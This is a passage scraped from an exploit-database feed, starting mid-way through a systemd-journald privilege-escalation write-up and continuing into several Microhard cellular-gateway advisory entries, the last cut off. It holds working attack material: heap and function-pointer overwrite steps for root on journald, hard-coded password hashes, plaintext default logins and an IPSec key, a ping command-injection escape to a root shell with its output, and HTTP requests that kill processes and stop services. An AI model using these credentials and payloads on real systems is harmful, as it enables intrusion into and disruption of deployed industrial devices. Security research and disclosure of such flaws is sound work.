leaked stack pointer we easily deduce journald's stack pointer\r\nbefore the alloca() jump, because the distance between the two depends\r\nonly on journald's executable.\r\n\r\n>From the leaked mmap address we can deduce libc's address, but chunks of\r\nunknown sizes are mmap()ed between the two, and we must therefore adopt\r\ndifferent strategies based on our target architecture (i386 or amd64).\r\n\r\n\r\n========================================================================\r\nCombined Exploitation of CVE-2018-16865 and CVE-2018-16866\r\n========================================================================\r\n\r\n Don't leave your seats now\r\n Popcorn everywhere ...\r\n -- System of a Down, \"CUBErt\"\r\n\r\n------------------------------------------------------------------------\r\namd64 Exploitation\r\n------------------------------------------------------------------------\r\n\r\n- To deduce libc's address from the leaked mmap address of our native\r\n message, we arrange for this message to be mmap()ed into the 2MB hole\r\n between ld.so's read-execute and read-only segments: from this hole's\r\n address we deduce ld.so's address, and hence libc's address (with help\r\n from ldd's output).\r\n\r\n- If the resulting stack-to-libc distance is jumpable (if it is shorter\r\n than 4GB), then we proceed with our \"write-what-where\"; otherwise, we\r\n restart journald (we crash it with an alloca() of RLIMIT_STACK -- 8MB\r\n by default) and try again.\r\n\r\n We have a good chance of obtaining a jumpable stack-to-libc distance\r\n (and hence a root shell) after 2048 tries * 2 seconds ~= 68 minutes\r\n (by default, if journald crashes less than 5 times within 10 seconds,\r\n it is restarted automatically by systemd).\r\n\r\n- For the \"write-where\" part of our \"write-what-where\", we overwrite\r\n libc's __free_hook function pointer, whose address modulo 16 is always\r\n equal to 8 (on every amd64 distribution that we exploited).\r\n\r\n- For the \"write-what\" part of our \"write-what-where\", we overwrite\r\n __free_hook with the address of libc's system() function: whenever\r\n journald free()s data that we control, we achieve arbitrary command\r\n execution.\r\n\r\nLast-minute note: on CentOS 7, the usual function pointers in libc's\r\nread-write segment (__free_hook, __malloc_hook, etc) are not located at\r\nmultiples of 16 plus 8. To circumvent this problem:\r\n\r\n- First, we overwrite the \"_chain\" pointer of stderr's FILE structure\r\n with the address of our own fake FILE structure (this \"_chain\" pointer\r\n is located at a multiple of 16 plus 8, in libc's read-write segment).\r\n\r\n- Next, we corrupt one of malloc's internal variables (also in libc's\r\n read-write segment).\r\n\r\n- Last, we force a call to malloc() or free(), which detects the\r\n corruption of its internal variable and calls abort(), which calls\r\n _IO_flush_all_lockp(), which follows stderr's overwritten \"_chain\"\r\n pointer to our fake FILE structure; we eventually achieve arbitrary\r\n command execution by calling libc's system() via one of the function\r\n pointers in our fake FILE structure.\r\n\r\n------------------------------------------------------------------------\r\ni386 Exploitation\r\n------------------------------------------------------------------------\r\n\r\nOur i386 exploit is very similar to the amd64 exploit, but:\r\n\r\n- The stack-to-libc distance is always jumpable (it is roughly 128MB).\r\n\r\n- There is no hole between ld.so's read-execute and read-only segments.\r\n However, libc's address is randomized in a narrow range of 1MB and is\r\n therefore brute forcible: we have a good chance of correctly guessing\r\n libc's address after 1MB / 4KB = 256 tries * 2 seconds ~= 8 minutes.\r\n\r\n- For the \"write-where\" part of our \"write-what-where\", we overwrite\r\n libc's __malloc_hook function pointer (__free_hook was never located\r\n at a multiple of 16 plus 8 or 12 on the i386 distributions that we\r\n exploited, but __malloc_hook always is).\r\n\r\n- For the \"write-what\" part of our \"write-what-where\", we overwrite\r\n __malloc_hook with the address of a \"mov esp, 0x89fffa5d ; ret\" gadget\r\n (or equivalent stack pivot): since our native message can be as large\r\n as 768MB, we can mmap() it at 0x89fffa5d, take control of the stack,\r\n and return into libc's execve().\n\n# 0day.today [2019-01-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31916"}, {"lastseen": "2018-07-17T20:05:53", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30734", "href": "https://0day.today/exploit/description/30734", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Default Credentials Vulnerability", "type": "zdt", "sourceData": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Default Credentials\r\n \r\n \r\nVendor: Microhard Systems Inc.\r\nProduct web page: http://www.microhardcorp.com\r\nAffected version: IPn4G 1.1.0 build 1098\r\n IPn3Gb 2.2.0 build 2160\r\n IPn4Gb 1.1.6 build 1184-14\r\n IPn4Gb 1.1.0 Rev 2 build 1090-2\r\n IPn4Gb 1.1.0 Rev 2 build 1086\r\n Bullet-3G 1.2.0 Rev A build 1032\r\n VIP4Gb 1.1.6 build 1204\r\n VIP4G 1.1.6 Rev 3.0 build 1184-14\r\n VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196\r\n IPn3Gii / Bullet-3G 1.2.0 build 1076\r\n IPn4Gii / Bullet-LTE 1.2.0 build 1078\r\n BulletPlus 1.3.0 build 1036\r\n Dragon-LTE 1.1.0 build 1036\r\n \r\nSummary: The new IPn4Gb provides a rugged, industrial strength wireless solution\r\nusing the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb\r\nfeatures integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control\r\nLists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial\r\nRS232/485/422 devices!\r\n \r\nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses\r\nthe widespread deployment of cellular network infrastructure for critical data collection.\r\nFrom remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!\r\nThe IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It\r\nprovides robust and secure wireless communication of Serial, USB and Ethernet data.\r\n \r\nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength\r\nwireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things\r\nto the next level by providing features such as Ethernet with PoE, RS232 Serial port\r\nand 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated\r\nFirewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution\r\nworth looking at!\r\n \r\nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength\r\nwireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote\r\ncellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight\r\nsystem integration and design flexibility with dual Ethernet Ports and high power\r\n802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access\r\nControl Lists, the Dragon-LTE provides a solution for any cellular application!\r\n \r\nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE\r\nnetwork infrastructure for critical data communications. The VIP4Gb provides simultaneous\r\nnetwork connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital\r\nI/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in\r\nany application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.\r\nIt provides robust and secure wireless communication of Serial, Ethernet & WiFi data.\r\n \r\nDesc: The devices utilizes hard-coded credentials within its Linux distribution image.\r\nThese sets of credentials are never exposed to the end-user and cannot be changed through\r\nany normal operation of the gateway. Another vulnerability could allow an authenticated\r\nattacker to gain root access. The vulnerability is due to default credentials. An attacker\r\ncould exploit this vulnerability by logging in using the default credentials.\r\n \r\nTested on: httpd-ssl-1.0.0\r\n Linux 2.6.32.9 ([email\u00a0protected]) (gcc version 4.4.3)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2018-5480\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5480.php\r\n \r\n \r\n13.03.2018\r\n \r\n--\r\n \r\n \r\nSystem/Web/FTP:\r\n---------------\r\nroot:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash\r\nadmin:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:0:0:admin:/:/etc/m_cli/m_cli.sh\r\nupgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false\r\nat:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI\r\nnobody:*:65534:65534:nobody:/var:/bin/false\r\ntestlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh\r\ntestlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh\r\nmsshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh\r\n \r\nupgrade:admin\r\ntestlab:testlab\r\ntestlab1:testlab1\r\nadmin:admin\r\nmsshc:msshc\r\n \r\nBCLC config defaults:\r\n---------------------\r\nIPSec preshared key: DerekUsedThisSecureKeyToEncryptClientAccessIn2014\r\nAccess control user/pass: admin:[email\u00a0protected]\r\nNMS System setting pass: NotComplicated\r\nWebclient setting user/pass: webclient:AlsoNotComplicated\r\nSystem access control user/pass: readonly:ItIsAlmostFriday\n\n# 0day.today [2018-07-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30734"}, {"lastseen": "2018-07-18T04:05:27", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category local exploits", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30735", "href": "https://0day.today/exploit/description/30735", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Restricted Shell Escape Vulnerability", "type": "zdt", "sourceData": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Backdoor Jailbreak\r\n \r\n \r\nVendor: Microhard Systems Inc.\r\nProduct web page: http://www.microhardcorp.com\r\nAffected version: IPn4G 1.1.0 build 1098\r\n IPn3Gb 2.2.0 build 2160\r\n IPn4Gb 1.1.6 build 1184-14\r\n IPn4Gb 1.1.0 Rev 2 build 1090-2\r\n IPn4Gb 1.1.0 Rev 2 build 1086\r\n Bullet-3G 1.2.0 Rev A build 1032\r\n VIP4Gb 1.1.6 build 1204\r\n VIP4G 1.1.6 Rev 3.0 build 1184-14\r\n VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196\r\n IPn3Gii / Bullet-3G 1.2.0 build 1076\r\n IPn4Gii / Bullet-LTE 1.2.0 build 1078\r\n BulletPlus 1.3.0 build 1036\r\n Dragon-LTE 1.1.0 build 1036\r\n \r\nSummary: The new IPn4Gb provides a rugged, industrial strength wireless solution\r\nusing the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb\r\nfeatures integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control\r\nLists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial\r\nRS232/485/422 devices!\r\n \r\nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses\r\nthe widespread deployment of cellular network infrastructure for critical data collection.\r\nFrom remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!\r\nThe IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It\r\nprovides robust and secure wireless communication of Serial, USB and Ethernet data.\r\n \r\nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength\r\nwireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things\r\nto the next level by providing features such as Ethernet with PoE, RS232 Serial port\r\nand 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated\r\nFirewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution\r\nworth looking at!\r\n \r\nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength\r\nwireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote\r\ncellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight\r\nsystem integration and design flexibility with dual Ethernet Ports and high power\r\n802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access\r\nControl Lists, the Dragon-LTE provides a solution for any cellular application!\r\n \r\nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE\r\nnetwork infrastructure for critical data communications. The VIP4Gb provides simultaneous\r\nnetwork connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital\r\nI/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in\r\nany application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.\r\nIt provides robust and secure wireless communication of Serial, Ethernet & WiFi data.\r\n \r\nDesc: The web shell application includes a service called Microhard Sh that is documented\r\nonly as 'reserved for internal use'. This service can be enabled by an authenticated\r\nuser within the Services menu in the web admin panel. This can also be enabled via CSRF\r\nattack. When the service is enabled, a user 'msshc' is created on the system with password\r\n'msshc' for SSH shell access on port 22. When connected, the user is dropped into a NcFTP\r\njailed environment, that has limited commands for file transfer administration. One of the\r\ncommands is a custom added 'ping' command that has a command injection vulnerability that\r\nallows the attacker to escape the restricted environment and enter into a root shell terminal\r\nthat can execute commands as the root user. \r\n \r\nTested on: httpd-ssl-1.0.0\r\n Linux 2.6.32.9 ([email\u00a0protected]) (gcc version 4.4.3)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2018-5486\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5486.php\r\n \r\n \r\n13.03.2018\r\n \r\n--\r\n \r\n \r\n1) Enable Microhard Sh service:\r\n-------------------------------\r\n \r\nhttp://192.168.1.1/cgi-bin/webif/system-services.sh?service=msshc&action=start - Start the Microhard Sh (msshc) service\r\nhttp://192.168.1.1/cgi-bin/webif/system-services.sh?service=msshc&action=enable - Auto-enable (auto-start)\r\n \r\n \r\n2) Check what happens when enabling Microhard Sh service:\r\n---------------------------------------------------------\r\n \r\n# cat /etc/init.d/msshc\r\n#!/bin/sh /etc/rc.common\r\n# Copyright (C) 2013 Microhardcorp\r\n \r\nstart() {\r\n deluser msshc\r\n rm -rf /tmp/msshc\r\n mkdir -p /tmp/msshc\r\n msshcshell=$(cat /etc/shells | grep -c \"/etc/msshc.sh\")\r\n [ $msshcshell -gt 0 ] || echo \"/etc/msshc.sh\" >> /etc/shells\r\n passwd=$(/sbin/uci get msshc.general.passwd)\r\n echo \"$passwd\" >> /etc/passwd\r\n}\r\n \r\nstop() {\r\n deluser msshc\r\n rm -rf /tmp/msshc\r\n}\r\n \r\n \r\n3) Check the /etc/msshc.sh script:\r\n----------------------------------\r\n \r\n# cat /etc/msshc.sh\r\n#!/bin/sh \r\n# Copyright (C) 2013 Microhardcorp\r\n \r\n/usr/bin/ncftp\r\n \r\nexit 0\r\n \r\n \r\n4) Check the /sbin/uci binary:\r\n------------------------------\r\n \r\nUsage: /sbin/uci [<options>] <command> [<arguments>]\r\n \r\nCommands:\r\n batch\r\n export [<config>]\r\n import [<config>]\r\n changes [<config>]\r\n commit [<config>]\r\n add <config> <section-type>\r\n add_list <config>.<section>.<option>=<string>\r\n show [<config>[.<section>[.<option>]]]\r\n get <config>.<section>[.<option>]\r\n set <config>.<section>[.<option>]=<value>\r\n delete <config>[.<section[.<option>]]\r\n rename <config>.<section>[.<option>]=<name>\r\n revert <config>[.<section>[.<option>]]\r\n \r\nOptions:\r\n -c <path> set the search path for config files (default: /etc/config)\r\n -d <str> set the delimiter for list values in uci show\r\n -f <file> use <file> as input instead of stdin\r\n -L do not load any plugins\r\n -m when importing, merge data into an existing package\r\n -n name unnamed sections on export (default)\r\n -N don't name unnamed sections\r\n -p <path> add a search path for config change files\r\n -P <path> add a search path for config change files and use as default\r\n -q quiet mode (don't print error messages)\r\n -s force strict mode (stop on parser errors, default)\r\n -S disable strict mode\r\n -X do not use extended syntax on 'show'\r\n \r\n# /sbin/uci get msshc.general.passwd\r\nmsshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh\r\n \r\n \r\n5) Check the NcFTP binary:\r\n--------------------------\r\n \r\n# /usr/bin/ncftp -h\r\n \r\nUsage: ncftp [flags] [<host> | <directory URL to browse>]\r\n \r\nFlags:\r\n -u XX Use username XX instead of anonymous.\r\n -p XX Use password XX with the username.\r\n -P XX Use port number XX instead of the default FTP service port (21).\r\n -j XX Use account XX with the username (rarely needed).\r\n -F Dump a sample $HOME/.ncftp/firewall prefs file to stdout and exit.\r\n \r\nProgram version: NcFTP 3.2.5/474 Feb 02 2011, 05:13 PM\r\nLibrary version: LibNcFTP 3.2.5 (January 17, 2011)\r\nBuild system: Linux DProBuilder 2.6.34.9-69.fc13.i686.PAE #1 SMP Tue Ma...\r\n \r\nThis is a freeware program by Mike Gleason (http://www.NcFTP.com).\r\nA directory URL ends in a slash, i.e. ftp://ftp.freebsd.org/pub/FreeBSD/\r\nUse ncftpget and ncftpput for command-line FTP and file URLs.\r\n \r\n \r\n6) Go to jail:\r\n--------------\r\n \r\n[email\u00a0protected]:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email\u00a0protected]\r\nThe authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.\r\nRSA key fingerprint is SHA256:x9GG/Dlkg88058ilA2xyhYqllYRgZOTPu6reGS8K1Yg.\r\nAre you sure you want to continue connecting (yes/no)? yes\r\nWarning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.\r\n[email\u00a0protected]'s password: \r\nNcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).\r\n \r\nCopyright (c) 1992-2011 by Mike Gleason.\r\nAll rights reserved.\r\n \r\nncftp> ?\r\nCommands may be abbreviated. 'help showall' shows hidden and unsupported \r\ncommands. 'help <command>' gives a brief description of <command>.\r\n \r\nascii close help mkdir put rename set umask \r\nbinary debug lls open pwd rhelp show \r\ncd dir lrm passive quit rm site \r\nchmod get ls ping quote rmdir type \r\n \r\nFor details, please see the manual (\"man ncftp\" at your regular shell prompt\r\nor online at http://www.NcFTP.com/ncftp/doc/ncftp.html).\r\nncftp> help showall\r\nCommands may be abbreviated. 'help showall' shows hidden and unsupported\r\ncommands. 'help <command>' gives a brief description of <command>.\r\n \r\n? chmod exit ls mv pwd rhelp site\r\nascii close get mget open quit rm type\r\nbinary debug help mkdir passive quote rmdir umask\r\nbye delete lls mls ping rename set\r\ncd dir lrm mput put rglob show\r\n \r\nFor details, please see the manual (\"man ncftp\" at your regular shell prompt\r\nor online at http://www.NcFTP.com/ncftp/doc/ncftp.html).\r\nncftp> ls\r\nls: must be connected to do that.\r\nncftp> man ncftp\r\nman: no such command.\r\nncftp> pwd\r\npwd: must be connected to do that.\r\nncftp> show\r\nanon-password [email\u00a0protected]\r\nauto-ascii |.txt|.asc|.html|.htm|.css|.xml|.ini|.pl|.hqx|.cfg|.c|.h|.cpp|.hpp|.bat|.m3u|.pls|\r\nauto-resume no\r\nautosave-bookmark-changes no\r\nconfirm-close no\r\nconnect-timeout 20\r\ncontrol-timeout 135\r\nlogsize 10240\r\npager more\r\npassive optional\r\nprogress-meter 2 (statbar)\r\nredial-delay 20\r\nsave-passwords ask\r\nshow-status-in-xterm-titlebar no\r\nso-bufsize 0 (use system default)\r\nxfer-timeout 3600\r\nyes-i-know-about-NcFTPd no\r\nncftp>\r\n \r\n \r\n7) The Shawshank Redemption:\r\n---------------------------- \r\n \r\nncftp> ping -c1 -4 0.0.0.0 `id` \r\nBusyBox v1.15.3 (2016-06-20 14:58:14 MDT) multi-call binary\r\n \r\nUsage: ping [OPTIONS] HOST\r\n \r\nSend ICMP ECHO_REQUEST packets to network hosts\r\n \r\nOptions:\r\n -4, -6 Force IPv4 or IPv6 hostname resolution\r\n -c CNT Send only CNT pings\r\n -s SIZE Send SIZE data bytes in packets (default:56)\r\n -I IFACE/IP Use interface or IP address as source\r\n -W SEC Seconds to wait for the first response (default:10)\r\n (after all -c CNT packets are sent)\r\n -w SEC Seconds until ping exits (default:infinite)\r\n (can exit earlier with -c CNT)\r\n -q Quiet, only displays output at start\r\n and when finished\r\n \r\nncftp>\r\n \r\n \r\n8) Come on Andy:\r\n----------------\r\n \r\nncftp> ping -c1 -4 0.0.0.0 && /bin/sh\r\nPING 0.0.0.0 (0.0.0.0): 56 data bytes\r\n64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.423 ms\r\n \r\n--- 0.0.0.0 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\r\nround-trip min/avg/max = 0.423/0.423/0.423 ms\r\n \r\n \r\nBusyBox v1.15.3 (2016-06-20 14:58:14 MDT) built-in shell (ash)\r\nEnter 'help' for a list of built-in commands.\r\n \r\n/tmp/msshc # id ; uname -r\r\nuid=0(root) gid=0(root)\r\n2.6.32.9\r\n/tmp/msshc #\n\n# 0day.today [2018-07-18] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30735"}, {"lastseen": "2018-07-18T02:01:37", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category dos / poc", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30737", "href": "https://0day.today/exploit/description/30737", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Denial of Service Vulnerability", "type": "zdt", "sourceData": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Service Control DoS\r\n \r\n \r\nVendor: Microhard Systems Inc.\r\nProduct web page: http://www.microhardcorp.com\r\nAffected version: IPn4G 1.1.0 build 1098\r\n IPn3Gb 2.2.0 build 2160\r\n IPn4Gb 1.1.6 build 1184-14\r\n IPn4Gb 1.1.0 Rev 2 build 1090-2\r\n IPn4Gb 1.1.0 Rev 2 build 1086\r\n Bullet-3G 1.2.0 Rev A build 1032\r\n VIP4Gb 1.1.6 build 1204\r\n VIP4G 1.1.6 Rev 3.0 build 1184-14\r\n VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196\r\n IPn3Gii / Bullet-3G 1.2.0 build 1076\r\n IPn4Gii / Bullet-LTE 1.2.0 build 1078\r\n BulletPlus 1.3.0 build 1036\r\n Dragon-LTE 1.1.0 build 1036\r\n \r\nSummary: The new IPn4Gb provides a rugged, industrial strength wireless solution\r\nusing the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb\r\nfeatures integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control\r\nLists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial\r\nRS232/485/422 devices!\r\n \r\nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses\r\nthe widespread deployment of cellular network infrastructure for critical data collection.\r\nFrom remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!\r\nThe IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It\r\nprovides robust and secure wireless communication of Serial, USB and Ethernet data.\r\n \r\nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength\r\nwireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things\r\nto the next level by providing features such as Ethernet with PoE, RS232 Serial port\r\nand 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated\r\nFirewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution\r\nworth looking at!\r\n \r\nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength\r\nwireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote\r\ncellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight\r\nsystem integration and design flexibility with dual Ethernet Ports and high power\r\n802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access\r\nControl Lists, the Dragon-LTE provides a solution for any cellular application!\r\n \r\nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE\r\nnetwork infrastructure for critical data communications. The VIP4Gb provides simultaneous\r\nnetwork connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital\r\nI/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in\r\nany application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.\r\nIt provides robust and secure wireless communication of Serial, Ethernet & WiFi data.\r\n \r\nDesc: There is an undocumented and hidden feature that allows an authenticated attacker\r\nto list running processes in the operating system and send arbitrary signals to kill\r\nany process running in the background including starting and stopping system services.\r\nThis impacts availability and can be triggered also by CSRF attacks that requires device\r\nrestart and/or factory reset to rollback malicious changes.\r\n \r\nTested on: httpd-ssl-1.0.0\r\n Linux 2.6.32.9 ([email\u00a0protected]) (gcc version 4.4.3)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2018-5481\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5481.php\r\n \r\n \r\n13.03.2018\r\n \r\n--\r\n \r\n \r\nPOST /cgi-bin/webif/status-processes.sh HTTP/1.1\r\nHost: 192.168.1.1\r\nConnection: keep-alive\r\nContent-Length: 34\r\nCache-Control: max-age=0\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nOrigin: http://166.130.177.150\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nReferer: http://192.168.1.1/cgi-bin/webif/status-processes.sh\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: style=null\r\n \r\nsignal=SIGILL&pid=1337&kill=+Send+\r\n \r\n \r\n===\r\n \r\n \r\nAvailable services:\r\n \r\n# ls /etc/init.d/\r\nboot dmesgbackup gpsgatetr ipsecfwadd mh_product quagga sysctl vlan\r\nchecksync dnsmasq gpsr keepalive modbusd rcS systemmode vnstat\r\ncoova-chilli done gpsrecorderd led msmscomd salertd telnet watchdog\r\ncron dropbear gred ledcon msshc sdpServer timezone webif\r\ncrontab eurd httpd localmonitord network snmpd twatchdog webiffirewalllog\r\ncustom-user-startup firewall ioports logtrigger ntpclient soip umount websockserverd\r\ndatausemonitord force_reboot iperf lte ntrd soip2 updatedd wsClient\r\ndefconfig ftpd ipsec lteshutdown nxl2tpd-wan soip2.getty usb xl2tpd\r\ndhcp_client gpsd ipsec_vpn media_ctrl pimd soipd1 vcad xl2tpd-wan\r\n \r\n \r\nStop the HTTPd:\r\n \r\nGET http://192.168.1.1/cgi-bin/webif/system-services.sh?service=httpd&action=stop HTTP/1.1\n\n# 0day.today [2018-07-18] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30737"}, {"lastseen": "2018-07-17T20:05:36", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30739", "href": "https://0day.today/exploit/description/30739", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation Vulnerability", "type": "zdt", "sourceData": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Arbitrary File Attacks\r\n \r\n \r\nVendor: Microhard Systems Inc.\r\nProduct web page: http://www.microhardcorp.com\r\nAffected version: IPn4G 1.1.0 build 1098\r\n IPn3Gb 2.2.0 build 2160\r\n IPn4Gb 1.1.6 build 1184-14\r\n IPn4Gb 1.1.0 Rev 2 build 1090-2\r\n IPn4Gb 1.1.0 Rev 2 build 1086\r\n Bullet-3G 1.2.0 Rev A build 1032\r\n VIP4Gb 1.1.6 build 1204\r\n VIP4G 1.1.6 Rev 3.0 build 1184-14\r\n VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196\r\n IPn3Gii / Bullet-3G 1.2.0 build 1076\r\n IPn4Gii / Bullet-LTE 1.2.0 build 1078\r\n BulletPlus 1.3.0 build 1036\r\n Dragon-LTE 1.1.0 build 1036\r\n \r\nSummary: The new IPn4Gb provides a rugged, industrial strength wireless solution\r\nusing the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb\r\nfeatures integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control\r\nLists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial\r\nRS232/485/422 devices!\r\n \r\nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses\r\nthe widespread deployment of cellular network infrastructure for critical data collection.\r\nFrom remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!\r\nThe IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It\r\nprovides robust and secure wireless communication of Serial, USB and Ethernet data.\r\n \r\nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength\r\nwireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things\r\nto the next level by providing features such as Ethernet with PoE, RS232 Serial port\r\nand 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated\r\nFirewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution\r\nworth looking at!\r\n \r\nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength\r\nwireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote\r\ncellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight\r\nsystem integration and design flexibility with dual Ethernet Ports and high power\r\n802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access\r\nControl Lists, the Dragon-LTE provides a solution for any cellular application!\r\n \r\nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE\r\nnetwork infrastructure for critical data communications. The VIP4Gb provides simultaneous\r\nnetwork connections for 